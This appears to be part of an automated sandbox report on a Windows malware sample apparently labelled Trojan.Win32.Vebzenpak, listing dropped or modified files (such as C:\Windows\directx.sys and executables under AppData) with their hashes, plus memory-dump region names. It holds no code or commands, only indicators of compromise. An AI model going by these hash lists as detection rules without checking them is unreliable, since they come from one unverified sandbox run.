C:\Users\Admin\AppData\Local\Temp\scoped_dir3012_1420145593\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 6b26981938ca86b4fa3e83148bfbd800 |
| SHA1 | 8a4c503a2be9b4589174a842e325d6623967a79c |
| SHA256 | f7fe336dca5af65094db2b8275ad85a58626a6a7c205d542f5429137601dc25d |
| SHA512 | fb7a47d8ab2b2c20be784fc24a19fd0cf155e70554d2c3626368d205eee00bfa02fabf1c500275e87c02629fa8ac2ff4bfaa247f5b13d500a7fa4af19a489db4 |
C:\Windows\directx.sys
| MD5 | 590a8a29b5d92d68914ddaa8407b7a1f |
| SHA1 | 08a4a5f9206f7b29e901f187bd97b7cc8254dfa0 |
| SHA256 | aa0f54b983b7ce13f85c4e3b11c3445f64065b4e36cb0887c9f7cc5fb261c00f |
| SHA512 | 2334ae78ed3e19beff1ebf2bad22cfc712736c1f94617e20fb2f508a6b8a8a6f07e32dbedfa2508dff604db7f42f28bc0d5f91631bb70c34abbb2c09be1f377e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2b4ee51c9e556528de41967dc1172d79 |
| SHA1 | db923b921595ee4161823044fb25a6149ce555bf |
| SHA256 | 92db1d85c791c7bf933ce6b75ca41c89dcb70d47de882414a592c07341c00f2f |
| SHA512 | 0514523be26e189feac866697f9d9f7003190c44561394950e9b5eb474961ae20774c26f952117b4e56265adddc128eb50ee39fbd4bde7fe3c455369fa0e15e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4a791622fc8cad9cf4ff72c1fb192f2c |
| SHA1 | e0a1b44684cc54ae2fb26750ebe82cb7302dbdaa |
| SHA256 | f7f0181261f41fc57a5c9cccc46993ef03fad4b5aa2fa4fb25df2fe2665e4ee2 |
| SHA512 | 77d7153968d0567b482e0400ff3a4a7d6cb652a60e138e119b0f4748dfcd5a2fe6e011ab87746b632968e27994a751af3c775510da418ddaf00f29e6117940e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | e13802e721eca437ff96d978e23163e7 |
| SHA1 | a173e338282e727b90620e1d50c379d2da7f7f7f |
| SHA256 | d0a2729b1898a05f53653e84e3c2abbd23a3f405bfdb9fb98acebc1cb0c6c19c |
| SHA512 | 18e903dc603657da14021aeb9dfe2361573466f42b1a03d102d49d66bed9ef8ef21ae56e7849dd55616aa2d2568e873ca06ecc473b2044b7aa74b1235b60c3db |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3699475f136f7979c2ad718d6f005925 |
| SHA1 | 9abf25f27a9323c1467136f4a50fa54100cd1050 |
| SHA256 | 5b65b17a170d780507204e2de0a07d71a5cc9a39907615e5e8404f77f3f4cd8a |
| SHA512 | 0afd5b8c4e5bdb36c970e0618dffdd9e9f02bc2216b2610b3d05b7430d2b28e348e564cbc07da9e929dce65e3fda9c6e88a7804781b12fad9b2c9051976c190b |
C:\Windows\directx.sys
| MD5 | 9b2646dd4b5af4d7e8dbca0eebb94ff4 |
| SHA1 | 7416a4ceb6a25b92eb197068f8cb4ce7d8cd046e |
| SHA256 | e055db4275b1c1470870e18e74d9f65bedc0dc02585a85262431a273cb1d7c54 |
| SHA512 | 74a0e4fceab1d9eca6f06b0801befff3a7a626d186c1912f67fc2e5b7b92d87a430863d657f2c90026835aba94781884eb2889fb60073fa3a02d8aac49a43f0e |
memory/4276-4082-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4520-4085-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | ebd8a3b39a2134a0d7e18b62988d54e0 |
| SHA1 | d4dd83f15ea7a2b6f04646077139ff58d9a90d81 |
| SHA256 | 1c09bea9363b6075c74099d3ed114531858eee638b46bfc5d2131641a6ef8d14 |
| SHA512 | f019f49bb40864a20450b86ea7e0ba44ee0a15bad7bc1a0e25e558c613be11d01eb2a7001f94eaef20767a39dbdf623cbf29602f7ec5f23a32bc1bc368e4a2af |
memory/460-4097-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9e49cab166d5f9067a8afda464a798a3 |
| SHA1 | 837562d13416a693dedfae1c40940ab86e117728 |
| SHA256 | 67b2cc06999f3eb56179275811bb1e1fdb4478b8dff8f27662d50f38e5989fdd |
| SHA512 | fd8765a833122a92fa1edddd2510e6ad2d6117c5be142d708d83dd1bdb4d741e991227c2e388675a7573cfa7ff7c1a5c209ae199c1f71530c882d0228396a33f |
memory/2012-4107-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4520-4117-0x0000000000400000-0x000000000041B000-memory.dmp
memory/460-4118-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
| MD5 | 113a5b6212166883a9326300bedb71c8 |
| SHA1 | 345fcae734af832a24041f1b61ea0b288f4cedf7 |
| SHA256 | 0c860d517b29953e126f807fec21e933de60da086fcba3987740d166d98ebe42 |
| SHA512 | a3b2fd43cb24cb4ce3908ff1f183cc60644df0f4f0ded5efb2654a803af64e00cbbd55e61fe4230b561031175dbd167c001e554bc1ec2a5624c8aab5869999b7 |
memory/460-4121-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f2e6b75cd33a5084deba0024ff682e40 |
| SHA1 | 2ed82bc0bed4ddf83b023a5d5bef16c433d4bc8f |
| SHA256 | 9c5e26a441db8b3ab94ff2f67991582efd40c240c01c383960f190e0fac4551f |
| SHA512 | 5189dda5fe35ab6f94102fafb7bd2614650ae2c964cf70606d560227dc3f7999e2748b042a62e9fd536a931e7445790e821e423745da5a3f76e7e9bda21395b4 |
C:\Users\Admin\AppData\Local\Temp\7zE4E8C106C\Trojan.Win32.Vebzenpak.zge-0f4b51a77a14b68958612251f2b78cd52af600a1ba5de9b1a6402865dd93d0e7
| MD5 | 83b9f48fdc1e12b5885a3f848b6648fd |
| SHA1 | 13cb131c7616c85dfdb112ac2c24b39f862803c4 |
| SHA256 | 0f4b51a77a14b68958612251f2b78cd52af600a1ba5de9b1a6402865dd93d0e7 |
| SHA512 | 4c95fd49587e1d7285d2b0a1661b9e42b2f48b71c259b91264324388344d8af1d231e2e5d609700fa09b3262e0dea6b0ea00c9eaba39156e07abd3b6e464679f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 76f2606c3537a377e8d9d69483017dff |
| SHA1 | a49f7e044cbf8828001aee795dbccf5c143df832 |
| SHA256 | 35bf89be2060ac4578f1d116e4095754c1b1280d7f08b6145896e7572f469b41 |
| SHA512 | 1fb66867e653f977d7e03e9f691026145afac41b839edfd569b9e7401585408a500e71e0a0bad4fc0622840b388200240bab9d17aaa57138d9fa8fe046ef9ce7 |
memory/4300-4155-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Windows\directx.sys
| MD5 | b0d781403529d7fc3ab62b011e376ec0 |
| SHA1 | c30194a2145d189b838fff61b03abbb28ddbbf4d |
| SHA256 | 95afddbad28bde82b25129882e1ebebc5536610fd4fe1ee2b339ec184f42aea4 |
| SHA512 | 107a76be11b35ef374923b43bcfa16a33f5722372f5fce3b53075e826efb2bf714232e41f15d69a8d4150d6094d981f4db72a9ebc15d5e250c28556dbacdd8af |
memory/2076-4163-0x0000000000B20000-0x0000000000C70000-memory.dmp
memory/2076-4164-0x0000000007E30000-0x0000000007ECC000-memory.dmp
memory/2076-4165-0x0000000008580000-0x0000000008B26000-memory.dmp
memory/2076-4166-0x0000000008070000-0x0000000008102000-memory.dmp
memory/2076-4167-0x0000000008000000-0x000000000800A000-memory.dmp
memory/2076-4168-0x0000000008200000-0x0000000008256000-memory.dmp
memory/2076-4169-0x0000000008060000-0x000000000806A000-memory.dmp
memory/2924-4174-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4408-4175-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4300-4176-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4408-4178-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4408-4180-0x00000000016D0000-0x00000000016FE000-memory.dmp
memory/4408-4177-0x00000000016D0000-0x00000000016FE000-memory.dmp
C:\Windows\directx.sys
| MD5 | 508916f9d2ec1bc13aedcbc05eace7ea |
| SHA1 | 52af9195bbc1fd3f68d7aa1ff7748a7444c3cb4e |
| SHA256 | 9d9d74f95fd72f02beb0edb9bbee2b11ffa764028c05f42dc475fa5ec3a5165b |
| SHA512 | 2eea212602f6a08d0e4ceea6a1a45e0b0c57dd847a064e0ab28f0472232d92bf9d86d2065b8c82f2caa9b90e33d8a24c7b191774914e2673df3c93187d8146d6 |
memory/4904-4194-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1432-4195-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b6d5ff3d49bbcca82ef6b0da7a593aab |
| SHA1 | 9c66fdcfa97f1c779bf5133882f9e5ce94af49a5 |
| SHA256 | 1c6f185fb80ecf9de6d80c2824dbc1d657f35c1282fc2bf031cafc51a28191ae |
| SHA512 | eaa32555c85a6d6b4466cc1c26dbd30ec1f427bbee255483167d29433f77e8627e5ffcd3bb6f9a6ca8ed407ff9a7bfd1013f9b571d378e0e85c9deb2d8cf534e |
memory/3100-4221-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 0f0c2de77bfb773b4b4e1bcc3f3266bb |
| SHA1 | cf07c998cd2e74340dd83c41382bc4eadb2033bf |
| SHA256 | a59d87cb68161f4c0827204f5a9569d84bae51477792b919dc5a18425e72ad61 |
| SHA512 | a585833f67bc63787dcabc7baace0f84f8fe819cc7c2d6231f134fff42eddf690328ccf5ff92fe8595dbcddbc58f6ccc8135d43688eb126fb9d35c83393a68a4 |
memory/2268-4228-0x0000000000400000-0x000000000041B000-memory.dmp
memory/760-4234-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2200-4240-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 96b745dc5570966d30ad076427594e7a |
| SHA1 | 9dcd87f0e02d464bde7a6b1200421c1fdc7842f8 |
| SHA256 | 16bf38d564d98844e8719b377c663ba75adc1fdb8c3257fc600b9125c48d9d2d |
| SHA512 | 1771b2b77007bbaa84a3874b119076d7e5e81fbc247d56cb5f71d98835f91e62744aa14c26582eb45e64c9060d6992e48597a9211370c10eaf73ccd513f70f64 |
memory/1432-4254-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3000-4266-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 77eff2033b746e8acc849afdc5dce6d1 |
| SHA1 | b7b7ffd112b95b7f3ac2f0bb64101a22b98d3050 |
| SHA256 | 5fb7b4d87765d19903bfb7ced4de563a99705dc728b3d05683b9dd16d5caf764 |
| SHA512 | d770663ec1f3cb52a99d0767dda52f84d949d5e3385fbc5d0d0566b1915ec34b425881454181b11ac78bb62020e95ed4f6cdc985eeadd41b66c51ac268cb76e4 |
memory/484-4272-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | daa4230e644a559585bcbe1df045db6f |
| SHA1 | 24996232564d765d7b3984fd8df26d35e3a81274 |
| SHA256 | 8a42f15fbc31c8c397f4e0412d2e4b21a9582719ef104036b3f837d92f5b81cd |
| SHA512 | 7c4f9bf99f85fae990908161b27068b69cfd31b8999b6f4a2e1699eabef85f021518ec8781cc62e7aa59bfaeb65f7b88060b2aad1ea248b17812da6d1b5f8d98 |
memory/2076-4303-0x0000000008F70000-0x0000000008FBE000-memory.dmp
memory/2076-4304-0x0000000008DE0000-0x0000000008E14000-memory.dmp
memory/3532-4305-0x0000000000400000-0x000000000042D000-memory.dmp
memory/2792-4308-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d9dedcaa59f2641d927879bb2fed85ba |
| SHA1 | 30153b4087bff23cb52db4fb7bef453d422a35d4 |
| SHA256 | e751c1b32a3c4af71fca94eca46defee049dc384a8998efb074b7cb92715567b |
| SHA512 | 75428a2ad495756818164848b526e2d0abe39a35f6d1d37403877912a6b5747064274e3947311ddfde242f66a29a6fe8826d9b1ca91f19083954375b054d1208 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c31bb46f42ea8007d3b253ad07a76c18 |
| SHA1 | 3143fa76777c92a3ab7cd85ac51d6f8dd6752039 |
| SHA256 | 02110ab889fe138483141f041b123df27ac9b38ba2a036883af9c4359c1254e4 |
| SHA512 | 47c3338034881a49355caef2b8f7091c6be1dfc7aa43644e835dac74b612cae2f12cfb4b89e9075b102d0fb00e754d8a4ab1a5ddfd3438682ba1d4a404151d72 |
C:\Windows\directx.sys
| MD5 | f7d7c8ed7c6e3368b84fd92559267b58 |
| SHA1 | 2e2fa1a92aee6806915f58dba7b8b9cb58692a68 |
| SHA256 | 22d5a4635de3bb2110a95cf65268abf367be911e7607439dd83eefff8796dea7 |
| SHA512 | 5a383d0064ef1a30879e16e64c9433cfcd62fb4c3450e2a212aea05fc6cc38a0239b41494ede306500815267c75c9a9384f0ca2903c7583d169288da10fb8870 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 02119ad338acb5028296d5eb029d35bb |
| SHA1 | f1df836c35127d2f0b5b75882be7d37b41c91f03 |
| SHA256 | 9426a75c6e2c1f54e25f80ab4a872c00bfbb7a2691685e611a26e1110e85bc25 |
| SHA512 | 120b3bc15410091fee56b0d40eaaaab0a50b899dc68bf6231ca6b22dd4423f777e81e93d6b0942d0034fe6cb604284839762f149185a72d6ae2ef525324dac0d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 68fb39f6b34f4cc70baef29e181ad800 |
| SHA1 | 0170c22821e6cd8eb33a6d0c8902bea4b52a9402 |
| SHA256 | fdd9f5895ebd572d9e259536c01b18269d6207f4ec7e2a8dc74cdc4d3efa2f7b |
| SHA512 | ce9c44ad18e080f624bbf1b72bfe64d76abb0c0b8621bbaa7d7fdcd4d1d518c05e1e3080aa40da4b899acb8a091a1dbd54c1ac8fffdbd2cb8c9c46ff81bd2d39 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1c2d012ee0b8c3d0b5c1e8576a9569f3 |
| SHA1 | e464889a7caeab2f9c1b8bf59b5f42785e3eb257 |
| SHA256 | dcb1a7582647b80590e4cc55d99986cbba4776d64a79717aba760a41eeb05797 |
| SHA512 | a863c0180f97cbf8da3522f6b5bc81382393088331d115d865dee65a92dcbfe7f17222b275e3804aac3b5f110fa931f651bbb75cced6b1cda1f8a4b7f905fd62 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 86d861d4cf2c2693a49fe9de5417dfa5 |
| SHA1 | 9b188494fad691f6b6449d25403d6442ed1f59a1 |
| SHA256 | e305f8031bb401d5fb1c97f865a08e2b85a8c60c9f002eba2066c192f9e39d25 |
| SHA512 | 13e8ab7353038574552f7694dab3fc741d5cb9de0987de61138cfccdb1efed936af9fb748bb248fd6663aa5d6df1de9a95bde109f6fd917ab0482871fc09cf23 |
C:\ProgramData\KMQ\TSH.001
| MD5 | e7477aa3d8a2370353589d2ecba6f24a |
| SHA1 | 466511105241b0ed7b36d3ca573d76e14d2ca6d9 |
| SHA256 | f51a79e59ef7b7f398b314882ed6bc07449076dbeaeb2930603db0e11879e989 |
| SHA512 | 1d28baf8092f641d79ef673ed00213495abd5b93a9296e680139fb9595aea568f0be9e789fcb9133fc9e9c6184020c2aa1c66bf2ac9d6d6be265ff6adf9cc451 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8f0cd165a26a873f9d3faa05d2d96a73 |
| SHA1 | 984897c9b0a41e245eff719f0704d8dbe8076fc2 |
| SHA256 | c1d15ebe1047eaea732b6531f8c0aebac35c1a1643f6a1e39b3971cbb18d8683 |
| SHA512 | f9e057aa02453915365765ff4acba5bdd863e7b4a4f12e6e985d53e8c2041d665b933540594eee08d548f45f16a80f072488c37bb18ba9a37c9be922f4977a3e |
C:\Windows\directx.sys
| MD5 | 9013e148365eb10e5f1fa4a7f8c6aebc |
| SHA1 | 77af3c0b09994d991fb5c92635287b9a61af5f08 |
| SHA256 | 6b4a08517dbbdd20182f37714ab4524f860a6bdec35918553cd1684967dafd74 |
| SHA512 | ebf2c33fcc97294a014027eb56be652d1bc8a45f6730b582130ae1c88b03b4b9d938d52f52ee03f421506c8a31e3dc98a456610507d1b1724104aab7eed955a0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 0f77fb1cc2720246fc5b65ab29b494e9 |
| SHA1 | 93a42f2b8f6c6e36cbe7d3bb266b29aa2ad37035 |
| SHA256 | 7a978cba31e7b97b1a45c8260177d326c00731a807ba9f0c79bcf1a0164a5ffd |
| SHA512 | 8c9c39614089ee6aaf3a912ad3b33a6911f3e30032e60887acb7b224c85c556722518da5701737bff65ea544056c85e89ec8f348d749cc96c1f512cb084c26eb |
C:\Windows\directx.sys
| MD5 | 77520d556e3a06f6aaac38014206eea9 |
| SHA1 | 1c1ede506e107008ea758f519839aa79670e9898 |
| SHA256 | 38c1f50847c0397dd1df72e004be6890a8321882b791389ff7f3194ab01832c0 |
| SHA512 | ee6624917dd63483aff467ecac47b272dc1f1d0860392cedcd57904fa596f84caeccb82715585b92b1d99d3e577bd146493a60e4561cb03fdbb520a4a0f078a7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 679b442fd989fe1a21a1350a6b392474 |
| SHA1 | 52ae196569be98a38cd51f22c0347c5e2a2d8bd0 |
| SHA256 | 93f31065f567a5ac32f9d5be2bc30b82be0492476e8664db0d85033a98bd5e3b |
| SHA512 | dca4b5d4c8915295295c478134372cdecbfdc9882e97f633c6927cc76ec74f946cb82579f932ae065ecb3e6a0e536827aafa9b47f875f3f2b6f49cbcd2cb2a27 |
C:\Windows\directx.sys
| MD5 | 679710f8c95ff80d8b3a5fb56405fea2 |
| SHA1 | 63c2a2b1e9dbe8c26dd75e8a60b78969b3e2e01b |
| SHA256 | 07bb1c5babffb5815c366636ea749b45bc8259c00386bdb9b72dd503dd00c316 |
| SHA512 | 9dbca2dde6b0f8973ff6e5a9dfbb2ad46d47c672dcb5af63bb2d109d203dac3cc0859642a2278f3910d4fa5d3eed445bea29ad77fe914cab5399e901f5a15953 |
memory/464-4564-0x00000000050D0000-0x0000000005106000-memory.dmp
memory/464-4565-0x00000000058E0000-0x0000000005F0A000-memory.dmp
memory/464-4566-0x00000000055B0000-0x00000000055D2000-memory.dmp
memory/464-4567-0x0000000005850000-0x00000000058B6000-memory.dmp
memory/464-4568-0x0000000006040000-0x00000000060A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvmea10w.rsg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/464-4578-0x00000000060B0000-0x0000000006407000-memory.dmp
memory/464-4579-0x0000000006550000-0x000000000656E000-memory.dmp
memory/464-4580-0x0000000006590000-0x00000000065DC000-memory.dmp
memory/4032-4589-0x0000000007B10000-0x000000000818A000-memory.dmp
memory/4032-4590-0x00000000072F0000-0x000000000730A000-memory.dmp
C:\Windows\directx.sys
| MD5 | 950ccf7cafeda307c3243a1fd5eac997 |
| SHA1 | c05e2823fa22e606f0f79644147aee4ac526bb9b |
| SHA256 | dcf12029f93f03863d6db8539a6c2b43bcd64a91d711895ba1ce823ccdad49a6 |
| SHA512 | ed568d7042b4916fadcd63a588c3551a5900ab9b106ce18d83d7c996181c715a165faa94269b8f1cdf51df4cd2bb4109282d7c37d9b23abe80911e5958e5b8f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | efc7d8c0d25f496869f049e39aeaccef |
| SHA1 | 1533cd2525f693ecab7e60fdb0cb91484e093317 |
| SHA256 | eb33fdcbffe34b9a2844636d1c50386454734c00b160912d90ff3117f9af5865 |
| SHA512 | 07642438f1ab955db38c578a4506cce2426d73af36378320ae62f9fc0f1a412ba07a8bf0ecf8a32bb4d3c4ab145435610d18c0f98628ffaa2bbfac40c9c15078 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | dedaad548f15a7f91dd81e525426e643 |
| SHA1 | 655b783b2c483266eedde856dfabea5f830bd60c |
| SHA256 | 31d1f44e71be2c30d1b6786b1abc571fdfcd177778a73fffe3b1c4c092168d21 |
| SHA512 | f54a0ef47257cb4c0f07f285b396266ea4ab7d3e665b36f8d629754a2a59e0ea339fdc6cce9c6d35593dd8320d1531bb1847608adc2ad41d81dd617635051208 |
C:\Users\Admin\AppData\Local\Temp\DB1
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\ProgramData\KMQ\TSH.001
| MD5 | 748042c7ffcb550d0fc8baf9cafb5c79 |
| SHA1 | eae4aafc6eb045171f99dba457fb0f358fdb8bce |
| SHA256 | 1c08d356565681eee5608ce184b639cfd4cfc5e50189079da8fb6267fbd2fde6 |
| SHA512 | 91070d068af70287f361e4925749ae096ffba3d50fcc186170890fa2147063c510ef252f3ed05949c3b70989be49f08a09977eb19203c2c75f7aed805684724e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 807116034efc863593ccdb82c8fa5646 |
| SHA1 | 45fa77982f64d940a16c9f93a6b70336e20ba387 |
| SHA256 | 31104d7007b360cbc412b173dc7dfc63c46218f496f9ddf73d4b572c283360ae |
| SHA512 | 52c0224bd343835a43d1d1cd38c86ba11b5ecd2b9abde2db78616afdc2c88e30ea2fbb6c08dd1628b50dd49e22f2a13f9a3569b0e1c03a43158669bc63d5ca8d |
C:\Users\Admin\AppData\Local\Temp\M2d9\IconCache3frdbf.exe
| MD5 | a02b404c77786816b91d6b1a11e0e1ff |
| SHA1 | eee6491c67af18743ef403b34fa61ab67bcf75f4 |
| SHA256 | 12682b2e7f9831339ab54913afd5fbbe42fb11af2c15d92f53776e5d45e50e94 |
| SHA512 | 6b628ee0612d1a5d3ad140fff2b46c76b6fd387c2eec2653b8c8f50794770225fb772d50d3aebc9a5d49411d16f61e27104a2220766c361788ba92a5e82ac276 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 555e2386dce925cda0a1ae2c7f47d06e |
| SHA1 | 7ac4b9d6d2c82424e46a116460ef1e45ccb53c3d |
| SHA256 | b7d83aae8dc2512c7e71ab84f2d23328d4a98a124f468afe5578117da4a56932 |
| SHA512 | 7a23d19ab1420d37677003c6331995e5b21c87d932e1f0cff993507b500777079de3ab5e5f7ac2b39f4d1303603198958d9080de10f25daa81b190272191148c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1998d2f43aa84f82aa904fb9e5e957ff |
| SHA1 | 04972038a24999689a8a467182c1ddb35bb2368f |
| SHA256 | f80200546116aea1ed8eeab731c5e15c29eed30b19cb8c210e3bbaf55e832ae7 |
| SHA512 | 1fe1c127c14dfd744b70c1e57d53db748816bd14bc79fe9252def0d9825d3b1a8a92e83410349a58835efa3ace2002eb5a6cbf6909407700cd3c7d176a709d83 |
C:\ProgramData\KMQ\TSH.004
| MD5 | 65ac172a86648a11d9edb58afdfb112c |
| SHA1 | cbd6eaccca36fd6c6beeac1e59aa3b1bbd16e78d |
| SHA256 | 711f165f40ca72e6b786b181898b6866524f41ad3d4ec3b2b66e8cd06a8b0132 |
| SHA512 | 3475c131f729d11fe16061e1fa8d2d6ce4ec9527e07f37b0e3b9cf3f38e471e7ada4157bae58773a2f7b29ee71a77f63ca59898d52d2902d7ff97c82c18c1370 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b87e594a0152aae6279f62216b30408c |
| SHA1 | 640712e401c194162b26668e05ce90ed31fe3652 |
| SHA256 | a083735161a794a6daa27bec67d63473ef64acfb512c32e0a036a3f9c432319e |
| SHA512 | e6145cbd7ba6e00b368d3e0b69ae48c875784d0e1904e8e0ba880d6222aae0d265d7f33cb5aadb666c816c8b573c2bb6f4ea12a56561e8197d7edb1d0eb188c5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | eeb33217def2ed3e42fc63918850b8ed |
| SHA1 | b2b56e3306f6add6a82fea79556c2bc390c49712 |
| SHA256 | 099c5683a671f9e048b07294efe174ebb7665d35df153a3127a19c92897ae943 |
| SHA512 | 96c6213842764da7bfaa381fc418e699295e4f40c55c6f25df6428bc3302b974004ff666259b1687aa93c9b9bf437cc155fbfa8f477e87caab81fd59f3af7ded |
memory/3796-4755-0x0000000008E50000-0x0000000008E84000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 329b5e114a5976add5870b4d357cc8f4 |
| SHA1 | f9d2f87318957cb94c37fa5f40171153d24b4300 |
| SHA256 | 1b3c4891adbdefe28fb70a27d1f0d13a4041c589a3ce7b54577baea7e76a4712 |
| SHA512 | 7645c871d44edade492fafb7ef08c2701f36d9642fd7b7c54deea6ea05c8d4537e0673494128a589d58e218fc56b67d812c3ce81de18e10d1579bf90c9609742 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 54a607f64cbca243f8d25bb9e9af8a65 |
| SHA1 | d9389458562e5122404dfbd70c17398b19674f9b |
| SHA256 | 82cd9a922df8d86969d7a6d2c2f05d21966bf60b623a8ca9b4e63bcaf7b8e322 |
| SHA512 | de00726ab8a265a397031acd0948429e900d5fc5ef8998d3a655d0330d582be0337562c406b85eb009ad21c4f3790de093549e3bdb695d44ccdb28dc945f3c73 |
C:\Windows\directx.sys
| MD5 | 79be168a63a78b6122087640c712136c |
| SHA1 | 5f292533ec7282823b9960b5e46648c3569c0380 |
| SHA256 | 5db7cd4a1604379e8bb693e5f684954b9224afe6cf8c7b4b2385f26aff7290ba |
| SHA512 | 66de67952cf9e2d78714955dae7fd4c80a676f99561689b37fffbfb7127ca4930ab80c93cc3f98e0f897e75c0d0ae491c4f344e5524d3c31b932d7ace02a5f54 |
memory/2476-4815-0x00000000007A0000-0x0000000000820000-memory.dmp
memory/2476-4817-0x0000000005510000-0x0000000005520000-memory.dmp
C:\Windows\directx.sys
| MD5 | 2e0caea87b32b995ff3bb51a253a0bca |
| SHA1 | 75320ead589f13016ab90c6317c2276b41463a78 |
| SHA256 | 3f5fd22843f99e1bd846fb9e8e7c1c7ca551343e677abf889c5186c291934c82 |
